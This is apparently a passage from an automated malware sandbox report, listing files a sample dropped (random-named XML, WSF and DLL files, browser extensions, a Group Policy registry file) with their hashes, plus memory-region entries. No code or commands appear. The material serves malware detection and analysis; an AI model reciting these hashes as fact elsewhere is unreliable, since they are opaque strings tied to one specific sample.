                                                                                                              cda441de3c7a7299a489f3215ad1d109ecd786dea2e6023d5003e73e45b823f5

                                                                                                              SHA512

                                                                                                              0d90e7706f0d20fca0f24a8ece5cb9fa05940d70430763ff2eaaa6df5a3640065b25d1cfc24eceb7c6b3e1f440865ef124599eca92557c63e1c5eddc12bd685e

                                                                                                            • C:\Program Files (x86)\tLkEVSRtDsYzC\fMNEccA.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              b29bca4748ed93bac953acb5c195a6e1

                                                                                                              SHA1

                                                                                                              f5df7959e66e920e44255fbb9ef1145c494c38e0

                                                                                                              SHA256

                                                                                                              45d6e5f8b9dedf85eda8955b2cca3edc3141175aeaa1120cd21b6384bba1c733

                                                                                                              SHA512

                                                                                                              cc44382c0321f557ae35e8fff5cfc11c249ae626ee93b9dd45f4426aad7c4dd19c9792b956bda5046976a551cd71b35b777d5c03c21904131fef02ef64ec9019

                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                              Filesize

                                                                                                              2.0MB

                                                                                                              MD5

                                                                                                              008453e59ccf00ac06147248b32007f5

                                                                                                              SHA1

                                                                                                              291e0b274423e07bee3df41887685d9fcb903cca

                                                                                                              SHA256

                                                                                                              76df549b8e88fab04b4a7bef84a331fb233e0d34d6f0caa94675e7f603433c91

                                                                                                              SHA512

                                                                                                              b86692f2a68714ffd1ceb485e0baa648a430feb12fc974efbb6604b6844043718b524f8bfd508e03358abe029f7ed6047382169374138326f4bbe397e72b5903

                                                                                                            • C:\ProgramData\mRubDAwgBrMXtHVB\JPJZVCE.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              88fb42782d67e1254c0a805ff74a3dd7

                                                                                                              SHA1

                                                                                                              7eb92e7154da844de2c98746127590aa563f2617

                                                                                                              SHA256

                                                                                                              5d670faff39f65438348189b86fea020a044d9de238bd6a0742737f5e63b682e

                                                                                                              SHA512

                                                                                                              cb7574a16ea1cb49e5656a2e83c5a79b87b6b5d638145060ddbc224d786eba3307de1701e089bb0c823bd7593e559ba6532e64f9921b49e143a983c010fe0bff

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                              Filesize

                                                                                                              187B

                                                                                                              MD5

                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                              SHA1

                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                              SHA256

                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                              SHA512

                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                              Filesize

                                                                                                              136B

                                                                                                              MD5

                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                              SHA1

                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                              SHA256

                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                              SHA512

                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                              Filesize

                                                                                                              150B

                                                                                                              MD5

                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                              SHA1

                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                              SHA256

                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                              SHA512

                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                              Filesize

                                                                                                              10KB

                                                                                                              MD5

                                                                                                              6f8bf6ae0bf2dbb1c092cbafa0be18d9

                                                                                                              SHA1

                                                                                                              f3636b5bc60c20dbc610d74b469c8cb7edc99141

                                                                                                              SHA256

                                                                                                              0d4298e1a9aa0c542236197605a444c86de43b7c6fe78ff27e2e2f5a2cdbbb01

                                                                                                              SHA512

                                                                                                              f61bb1a5cf9d630a53ff2db6d04d9ce08a8ad043f1c4cac6896828b03e976801db1f2c3f7ae5554f0e56f94ee2d0deb390dfac8d68581c4487aa1542d39a9276

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                              Filesize

                                                                                                              27KB

                                                                                                              MD5

                                                                                                              fccc7d0dbb52acf07244167dc8bf5d3a

                                                                                                              SHA1

                                                                                                              a8335c6fa361f3717c54bf3987dc81d9a14f5ca1

                                                                                                              SHA256

                                                                                                              66791f7acdbd58d59ba447442afe29b8bbf914d69526f9d7504f952f394e509c

                                                                                                              SHA512

                                                                                                              0a216d0b883cc3000abc5dea7115c29461fd7c90b272919fe3bc608763b1053c7017c573a4d1d53ae30975cd2ae2055abf757c3b3f3a89420ee7d7514f34c6cf

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              f75574d392418a31e9243aedb0014197

                                                                                                              SHA1

                                                                                                              64a9b7cbbb7bb7130932d959e4c38a491d59a6cb

                                                                                                              SHA256

                                                                                                              3774333cfd5eb5e44018dc73408380f684cde97c65f794527c60f86389d3322f

                                                                                                              SHA512

                                                                                                              ca192b00c606e0be52405e2c25c4cd26ada72fde736eaec7a7dd9f1544a70cb112edff640c1e34e8661eed725f86375cce81caca47f5e95bc50d73af98a4269b

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              20a3ea75fbdb0749aac07ede6fefa7b3

                                                                                                              SHA1

                                                                                                              8e1f3ac67e25428dded6da6306d3ee74e509f2f5

                                                                                                              SHA256

                                                                                                              2e453ae4cc28b198d5fb4cdd11ae2a37a46a89ff9eb1f6cdb241bb443a015c86

                                                                                                              SHA512

                                                                                                              3eb29c77b4a36dae5ea062376915986dcacf5b19685c392d11282517ab0cc7cc8a605959f015066c659a16d0ed1c0f06a3b0553bdffb64329086db8300b15754

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              bc376ff0a76f5d43a211120aa65fa877

                                                                                                              SHA1

                                                                                                              21143e2cb2222bc2a359992887751138afb7de85

                                                                                                              SHA256

                                                                                                              8036a84788597efd4d18dec85cfacbaf21cefbe6e4c81ecff7b6b8728a924d62

                                                                                                              SHA512

                                                                                                              24f6102d6f18a0b1b06ec770b97b9be2808e3bccf31185d27c1c482e0cf45233df31fe38e49bed258e81b35f82e61645b705783fe47782672be777770cbff8cb

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs.js

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              db5b0da8a364e85d3152290d64bd3c86

                                                                                                              SHA1

                                                                                                              76f85df90732868ad43c4e9cf1d6a3dba969ecfa

                                                                                                              SHA256

                                                                                                              7941e96ba12412a68fc130d49fc01e4c69a61f454ee5469af8adca883d99beac

                                                                                                              SHA512

                                                                                                              5adb195cf875c5d0ecfcbd2df450b7753c2039ada9dc1996757580ba9380cfd69c0b62a2708e566bb1d178ec81588d5d482977f63019b5ce3eb3fde417951d91

                                                                                                            • C:\Windows\Temp\CDACQYHYzIkxBFHu\lijzWtfO\QmdplbooTphGDcIc.wsf

                                                                                                              Filesize

                                                                                                              9KB

                                                                                                              MD5

                                                                                                              1671b9c881346bd7b571681cbfe5522d

                                                                                                              SHA1

                                                                                                              8914fd907975dc0ae7a2525d9fc678fd972ffce3

                                                                                                              SHA256

                                                                                                              bf80d9ee26cfe2d5adfbccb8afd4c7d862a1df49950087e138fd0be178f72648

                                                                                                              SHA512

                                                                                                              d727b259778c3ad6323a3624ba6d024c07452c5d023ba949f179248f49f3d3e63e89b71f47d3e93384fcf9bfb5420c7b314208cf37c38d6e75ac1f4b6bf4018f

                                                                                                            • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                              Filesize

                                                                                                              6KB

                                                                                                              MD5

                                                                                                              bf78f4bd453907c908af132346ed1bda

                                                                                                              SHA1

                                                                                                              b6596195af11095f304ce91a12ebc5d336ecfd18

                                                                                                              SHA256

                                                                                                              4089b02d654903d8057c7948eb188d9ec315aca612c3c1fc499d4f3cd01cbcc4

                                                                                                              SHA512

                                                                                                              9ffcb7f4e0af498a56ac88ab99163b3e59ca964658d1fe146684a19fbaa08f492a3b730294eeaaefdf586186df9705ac3a939a97784820c40d35ffe187ad2da4

                                                                                                            • \Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe

                                                                                                              Filesize

                                                                                                              6.4MB

                                                                                                              MD5

                                                                                                              50472199d16b10bb15eea2ac6b989fce

                                                                                                              SHA1

                                                                                                              c38ddc2b177e12543ffd196f56bc5f5a65b74624

                                                                                                              SHA256

                                                                                                              b0f62d8368952935d132f7e7b270dd7d0a789a3383329c17c6607fc84ce926d1

                                                                                                              SHA512

                                                                                                              0bcae780b0ec7e8bc6e7cd6198300617ad242a41d8f044f9ccf63812c2f6b44f05977eae48725304dc5c3a4035fa76a72801657e4ed9f37349ac9f7745fa5af7

                                                                                                            • \Users\Admin\AppData\Local\Temp\7zSC6B9.tmp\Install.exe

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                              MD5

                                                                                                              d06c4ea4afe208fef122dfa81281ff20

                                                                                                              SHA1

                                                                                                              7dfa650564a79cec9e9124d9a855298831901013

                                                                                                              SHA256

                                                                                                              18d45795874942e98014f5a55997aee18659ab13ab31828ae2ee3982b5720a2a

                                                                                                              SHA512

                                                                                                              3d9cee5df9e232be275a7a917c1d7f5972cbd55075b3b3807d1e5a255b1139c663004566d58d4b869c0d587659976575827b78b4746e97ad9e35b55869e19264

                                                                                                            • \Windows\Temp\CDACQYHYzIkxBFHu\ULOrTxBt\nmHmEZb.dll

                                                                                                              Filesize

                                                                                                              6.5MB

                                                                                                              MD5

                                                                                                              829dfee3bf1fc005821c99d1b88248ae

                                                                                                              SHA1

                                                                                                              39abeabe911c7392ac29118dcb7bca774bda07f3

                                                                                                              SHA256

                                                                                                              aeed7116b06b7cf1506730dbe14a61c67bd3a7bb224a30640b49fdb5b7a2ef28

                                                                                                              SHA512

                                                                                                              4774194a5006c3c2b5535d66054fb96c131b765c9ea5e6a751c5b8996a38612810ddbe605b336cc90defe851149347b25d2a6a93958efa02cb28ad340ccf9e5c

                                                                                                            • memory/568-56-0x0000000002310000-0x0000000002318000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/568-55-0x000000001B600000-0x000000001B8E2000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.9MB

                                                                                                            • memory/1648-78-0x000000001B730000-0x000000001BA12000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.9MB

                                                                                                            • memory/1736-46-0x0000000010000000-0x00000000110F0000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.9MB

                                                                                                            • memory/1736-43-0x0000000000A30000-0x00000000010F4000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.8MB

                                                                                                            • memory/1736-91-0x0000000000A30000-0x00000000010F4000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.8MB

                                                                                                            • memory/1736-67-0x0000000000A30000-0x00000000010F4000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.8MB

                                                                                                            • memory/1928-66-0x0000000002250000-0x0000000002258000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/1928-65-0x000000001B640000-0x000000001B922000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.9MB

                                                                                                            • memory/2072-341-0x00000000014C0000-0x00000000025B0000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.9MB

                                                                                                            • memory/2120-89-0x0000000001110000-0x00000000017D4000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.8MB

                                                                                                            • memory/2120-104-0x0000000001E40000-0x0000000001EC5000-memory.dmp

                                                                                                              Filesize

                                                                                                              532KB

                                                                                                            • memory/2120-93-0x0000000010000000-0x00000000110F0000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.9MB

                                                                                                            • memory/2120-319-0x0000000002040000-0x00000000020C0000-memory.dmp

                                                                                                              Filesize

                                                                                                              512KB

                                                                                                            • memory/2120-329-0x0000000002AB0000-0x0000000002B84000-memory.dmp

                                                                                                              Filesize

                                                                                                              848KB

                                                                                                            • memory/2120-137-0x00000000010A0000-0x0000000001104000-memory.dmp

                                                                                                              Filesize

                                                                                                              400KB

                                                                                                            • memory/2120-372-0x0000000001110000-0x00000000017D4000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.8MB

                                                                                                            • memory/2452-40-0x0000000000810000-0x0000000000ED4000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.8MB

                                                                                                            • memory/2452-39-0x00000000012D0000-0x0000000001994000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.8MB

                                                                                                            • memory/2452-28-0x0000000010000000-0x00000000110F0000-memory.dmp

                                                                                                              Filesize

                                                                                                              16.9MB

                                                                                                            • memory/2452-24-0x0000000000810000-0x0000000000ED4000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.8MB

                                                                                                            • memory/2452-23-0x00000000012D0000-0x0000000001994000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.8MB

                                                                                                            • memory/3040-22-0x00000000023E0000-0x0000000002AA4000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.8MB